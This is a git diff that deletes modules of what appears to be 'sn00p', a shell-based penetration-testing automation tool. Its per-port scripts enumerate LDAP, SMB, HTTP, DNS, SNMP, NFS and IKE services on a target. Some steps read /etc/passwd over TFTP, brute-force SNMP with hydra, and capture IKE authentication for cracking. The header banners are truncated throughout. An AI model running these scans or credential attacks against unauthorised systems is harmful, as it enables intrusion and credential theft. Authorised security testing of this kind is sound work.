- - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# gather LDAP / AD information via ldapenum -# TOOLS: ldapenum.pl -do_ldapenum() -{ - opts="-U -G -E -v" - - ldapenum.pl ${opts} -i ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/443.sh b/automation/sn00p/source/src/modules/tcp/443.sh deleted file mode 100644 index 810fcf4..0000000 --- a/automation/sn00p/source/src/modules/tcp/443.sh +++ /dev/null @@ -1,254 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# globals -domain="`head -1 ../../host/default/domain.log 2> /dev/null`" -ua="User-Agent: sn00p.sh" -ref="Referrer: http://www.sn00p.sh/" -clen="Content-Length: -1" - - -# send HEAD request -# TOOLS: openssl -do_https_head() -{ - # 1.0 - echo -e "HEAD / HTTP/1.0\r\n\n" | - openssl s_client -connect ${DHOST}:${DPORT} 2>&1 - - # force new line - echo "" - - # 1.1 - echo -e "HEAD / HTTP/1.1\nHOST:${domain}\n${ua}\n${ref}\n${clen}\r\n\n" | - openssl s_client -connect ${DHOST}:${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# send GET request -# TOOLS: openssl -do_https_get() -{ - # 1.0 - echo -e "GET / HTTP/1.0\r\n\n" | - openssl s_client -connect ${DHOST}:${DPORT} 2>&1 - - # force new line - echo "" - - # 1.1 - echo -e "GET / HTTP/1.1\nHOST:${domain}\n${ua}\n${ref}\n${clen}\r\n\n" | - openssl s_client -connect ${DHOST}:${DPORT} 2>&1 - - return ${SUCCESS} -} - -# send POST request -# TOOLS: openssl -do_https_post() -{ - # 1.0 - echo -e "POST / HTTP/1.0\r\n\n" | - openssl s_client -connect ${DHOST}:${DPORT} 2>&1 - - - # force new line - echo "" - - # 1.1 - echo -e "POST / HTTP/1.1\nHOST:${domain}\n${ua}\n${ref}\n${clen}\r\n\n" | - openssl s_client -connect ${DHOST}:${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# send OPTIONS request -# TOOLS: openssl -do_https_options() -{ - # 1.0 - echo -e "OPTIONS / HTTP/1.0\r\n\n" | - openssl s_client -connect ${DHOST}:${DPORT} 2>&1 - - # force new line - echo "" - - # 1.1 - echo -e "OPTIONS / HTTP/1.1\nHOST:${domain}\n${ua}\n${ref}\n${clen}\r\n\n" | - openssl s_client -connect ${DHOST}:${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# run httping -# TOOLS: httping -do_https_httping() -{ - opts="-a -t 3 -c 2 -l -I sn00p.sh -R http://sn00p.sh/" - - httping ${opts} -p ${DPORT} -h ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# fingerprint server via httprint -# TOOLS: httprint -do_https_httprint() -{ - opts="-P0 -th 16" - sigs="/usr/share/httprint/signatures.txt" - - httprint -h "http://${DHOST}:${DPORT}" -s ${sigs} ${opts} 2>&1 - - return ${SUCCESS} -} - - -# try to get infos over rpc endpoint mapper via rpcdump.py -# TOOLS: rpcdump.py -do_https_rpcdump() -{ - rpcdump.py ${DHOST} "80/HTTP" 2>&1 - - return ${SUCCESS} -} - - -# crawl website via nikto -# TOOLS: nikto.sh -do_https_nikto() -{ - opts="-C all -ssl -no404" - - nikto.sh ${opts} -p ${DPORT} -h ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/445.sh b/automation/sn00p/source/src/modules/tcp/445.sh deleted file mode 100644 index 3a457c9..0000000 --- a/automation/sn00p/source/src/modules/tcp/445.sh +++ /dev/null @@ -1,145 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# try to get infos over msrpc endpoint mapper via rpcdump.py -# TOOLS: rpcdump.py -do_rpcdump() -{ - rpcdump.py ${DHOST} "445/SMB" 2>&1 - - return ${SUCCESS} -} - - -# try to get as much as possible via enum4linux -# TOOLS: enum4linux -do_enum4linux() -{ - opts="-a" - - enum4linux ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/500.sh b/automation/sn00p/source/src/modules/tcp/500.sh deleted file mode 100644 index bfc7a02..0000000 --- a/automation/sn00p/source/src/modules/tcp/500.sh +++ /dev/null @@ -1,159 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# connect and try to get infos about logged in users -# TOOLS: ike-scan -do_ikescan() -{ - opts="" - - ike-scan ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# probe ike requests and enumerate ike related stuff via IKEProber.pl -# TOOLS: ikeprober -do_ikeprober() -{ - opts="" - - perl ikeprober -d ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# capture authentication messages (aggressive mode IKE) via ikecrack-snarf -# TOOLS: ikecrack-snarf-1.00.pl -do_ikecrack_snarf() -{ - opts="" - - ikecrack-snarf-1.00.pl "${DHOST}.${DPORT}" 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/53.sh b/automation/sn00p/source/src/modules/tcp/53.sh deleted file mode 100644 index c917459..0000000 --- a/automation/sn00p/source/src/modules/tcp/53.sh +++ /dev/null @@ -1,177 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# try to get version of bind via host -# TOOLS: host -do_version_bind_host() -{ - opts="-c chaos -t txt version.bind" - - host ${opts} ${DHOST} 2>&1 - -} - - -# try to get version of bind via dig -# HOST: dig -do_version_bind_dig() -{ - opts="version.bind txt chaos" - - dig @${DHOST} ${opts} 2>&1 - - return ${SUCCESS} -} - - -# test for cache sn00ping -# TOOLS: dig -do_snoop_cache() -{ - opts="A +norecurse" - site="youporn.com" - - # make first request - dig @${DHOST} ${site} ${opts} 2>&1 | grep -i "answer" - - # just newline - echo - - # make second request (ANSWER flag) - dig @${DHOST} ${site} ${opts} 2>&1 | grep -i "answer" - - return ${SUCCESS} -} - - -# fingerprint dns via fpdns -# TOOLS: fpdns -do_fpdns() -{ - opts="-c -f" - - fpdns ${opts} ${DHOST} - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/69.sh b/automation/sn00p/source/src/modules/tcp/69.sh deleted file mode 100644 index 15e184f..0000000 --- a/automation/sn00p/source/src/modules/tcp/69.sh +++ /dev/null @@ -1,135 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# connect and try to get passwd via atfp -# TOOLS: atftp -do_atftp_connect() -{ - opts="--verbose -g -r /etc/passwd -l passwd" - - atftp ${opts} ${DHOST} ${DPORT} - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/79.sh b/automation/sn00p/source/src/modules/tcp/79.sh deleted file mode 100644 index 60b7714..0000000 --- a/automation/sn00p/source/src/modules/tcp/79.sh +++ /dev/null @@ -1,143 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# finger all users -# TOOLS: finger -do_finger_users() -{ - finger -l "@${DHOST}" 2>&1 - - return ${SUCCESS} -} - - -# finger all users and more infos -# TOOLS: finger -do_finger_more() -{ - finger "0@${DHOST}" 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/80.sh b/automation/sn00p/source/src/modules/tcp/80.sh deleted file mode 100644 index 28e9ad8..0000000 --- a/automation/sn00p/source/src/modules/tcp/80.sh +++ /dev/null @@ -1,248 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# http header stuff -domain="`head -1 ../../host/default/domain.log 2> /dev/null`" -ua="User-Agent: sn00p.sh" -ref="Referrer: http://www.sn00p.sh/" -clen="Content-Length: -1" - - -# send HEAD request -# TOOLS: ncat -do_http_head() -{ - # 1.0 - echo -e "HEAD / HTTP/1.0\r\n\n" | ncat -v -w 3 ${DHOST} ${DPORT} 2>&1 - - # force new line - echo "" - - # 1.1 - echo -e "HEAD / HTTP/1.1\nHOST:${domain}\n${ua}\n${ref}\n${clen}\r\n\n" | - ncat -v -w 3 ${DHOST} ${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# send GET request -# TOOLS: ncat -do_http_get() -{ - # 1.0 - echo -e "GET / HTTP/1.0\r\n\n" | ncat -v -w 3 ${DHOST} ${DPORT} 2>&1 - - # force new line - echo "" - - # 1.1 - echo -e "GET / HTTP/1.1\nHOST:${domain}\n${ua}\n${ref}\n${clen}\r\n\n" | - ncat -v -w 3 ${DHOST} ${DPORT} 2>&1 - - return ${SUCCESS} -} - -# send POST request -# TOOLS: ncat -do_http_post() -{ - # 1.0 - echo -e "POST / HTTP/1.0\r\n\n" | ncat -v -w 3 ${DHOST} ${DPORT} 2>&1 - - # force new line - echo "" - - # 1.1 - echo -e "POST / HTTP/1.1\nHOST:${domain}\n${ua}\n${ref}\n${clen}\r\n\n" | - ncat -v -w 3 ${DHOST} ${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# send OPTIONS request -# TOOLS: ncat -do_http_options() -{ - # 1.0 - echo -e "OPTIONS / HTTP/1.0\r\n\n" | ncat -v -w 3 ${DHOST} ${DPORT} 2>&1 - - # force new line - echo "" - - # 1.1 - echo -e "OPTIONS / HTTP/1.1\nHOST:${domain}\n${ua}\n${ref}\n${clen}\r\n\n" | - ncat -v -w 3 ${DHOST} ${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# run httping -# TOOLS: httping -do_http_httping() -{ - opts="-a -t 3 -c 2 -I sn00p.sh -R http://sn00p.sh/" - - httping ${opts} -p ${DPORT} -h ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# fingerprint server via httprint -# TOOLS: httprint -do_http_httprint() -{ - opts="-P0 -th 16" - sigs="/usr/share/httprint/signatures.txt" - - httprint -h "http://${DHOST}:${DPORT}" -s ${sigs} ${opts} 2>&1 - - return ${SUCCESS} -} - - -# try to get infos over rpc endpoint mapper via rpcdump.py -# TOOLS: rpcdump.py -do_http_rpcdump() -{ - rpcdump.py ${DHOST} "80/HTTP" 2>&1 - - return ${SUCCESS} -} - - -# crawl website via nikto -# TOOLS: nikto.sh -do_http_nikto() -{ - opts="-C all -no404" - - nikto.sh ${opts} -p ${DPORT} -h ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/default.sh b/automation/sn00p/source/src/modules/tcp/default.sh deleted file mode 100644 index 5a5eb99..0000000 --- a/automation/sn00p/source/src/modules/tcp/default.sh +++ /dev/null @@ -1,167 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# connect and try to read banner or at least some response (bytes) via netcat -# TOOLS: ncat -do_ncat_connect() -{ - echo "" | ncat -v -w 3 ${DHOST} ${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# read banner via amap -# TOOLS: amap -do_amap() -{ - opts="-bqv -c 64 -C 2 -T 3 -t 3" - - amap ${opts} ${DHOST} ${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# read banner, do rpc scans, fingerprint and run NSE script via nmap -# TOOLS: nmap -do_nmap_banner() -{ - opts="-n -sTCV -PN --version-all" - - nmap ${opts} -p ${DPORT} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# connect via SSL and try to read -# TOOLS: openssl -do_openssl_connect() -{ - echo "" | openssl s_client -connect ${DHOST}:${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/udp/135.sh b/automation/sn00p/source/src/modules/udp/135.sh deleted file mode 100644 index bb7fed0..0000000 --- a/automation/sn00p/source/src/modules/udp/135.sh +++ /dev/null @@ -1,133 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# try to get infos over msrpc endpoint mapper via rpcdump.py -# TOOLS: rpcdump.py -do_rpcdump() -{ - rpcdump.py ${DHOST} "135/UDP" 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/udp/137.sh b/automation/sn00p/source/src/modules/udp/137.sh deleted file mode 100644 index 8ff5a36..0000000 --- a/automation/sn00p/source/src/modules/udp/137.sh +++ /dev/null @@ -1,157 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j}+ 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# audit netbios via nbaudit -# TOOLS: nbaudit -do_nbaudit() -{ - nbaudit ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# scan for netbios infos via nbtscan -# TOOLS: nbtscan -do_nbtscan() -{ - opts="-v -r" - - nbtscan ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# scan for netbios infos via nmbscan -# TOOLS: nmbscan -do_nmbscan() -{ - opts="-h" - - nmbscan ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/udp/161.sh b/automation/sn00p/source/src/modules/udp/161.sh deleted file mode 100644 index ff3d24d..0000000 --- a/automation/sn00p/source/src/modules/udp/161.sh +++ /dev/null @@ -1,174 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# get infos over version 1 via snmpwalk -# TOOLS: snmpwalk -do_snmpwalk_v1() -{ - opts="-v 1 -c public" - - snmpwalk ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# get infos over version 2 via snmpwalk -# TOOLS: snmpwalk -do_snmpwalk_v2() -{ - opts="-c public -v 2c" - - snmpwalk ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# get infos via onesixtyone -# TOOLS: onesixtyone -do_onesixtyone() -{ - opts="-d" - - onesixtyone ${opts} ${DHOST} "public" 2>&1 - - return ${SUCCESS} -} - - -# bruteforce via hydra -# TOOLS: hydra -do_hydra_snmp() -{ - opts="-e nsr -f -v" - - for i in ${PLISTS} - do - hydra ${opts} -P ${i} "snmp://${DHOST}" 2>&1 - done - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/udp/2049.sh b/automation/sn00p/source/src/modules/udp/2049.sh deleted file mode 100644 index 848bd90..0000000 --- a/automation/sn00p/source/src/modules/udp/2049.sh +++ /dev/null @@ -1,147 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# get exported shares / directories via showmount -# TOOLS: showmount -do_showmount() -{ - opts="-e" - - showmount ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# get infos about clients connected to mounted dirs via showmount -# TOOLS: showmount -do_showmount_clients() -{ - opts="-a" - - showmount ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/udp/500.sh b/automation/sn00p/source/src/modules/udp/500.sh deleted file mode 100644 index ccf6751..0000000 --- a/automation/sn00p/source/src/modules/udp/500.sh +++ /dev/null @@ -1,159 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# connect and try to get infos about logged in users -# TOOLS: ike-scan -do_ikescan() -{ - opts="" - - ike-scan ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# probe ike requests and enumerate ike related stuff via IKEProber.pl -# TOOLS: ikeprober -do_ikeprober() -{ - opts="" - - ikeprober -d ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# capture authentication messages (aggressive mode IKE) via ikecrack-snarf -# TOOLS: ikecrack-snarf-1.00.pl -do_ikecrack_snarf() -{ - opts="" - - ikecrack-snarf-1.00.pl "${DHOST}.${DPORT}" 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/udp/513.sh b/automation/sn00p/source/src/modules/udp/513.sh deleted file mode 100644 index 45a2918..0000000 --- a/automation/sn00p/source/src/modules/udp/513.sh +++ /dev/null @@ -1,135 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# connect and try to get infos about logged in users -# TOOLS: rwho -do_rwho() -{ - opts="-a" - - rwho ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/udp/53.sh b/automation/sn00p/source/src/modules/udp/53.sh deleted file mode 100644 index aa86ff1..0000000 --- a/automation/sn00p/source/src/modules/udp/53.sh +++ /dev/null @@ -1,131 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in 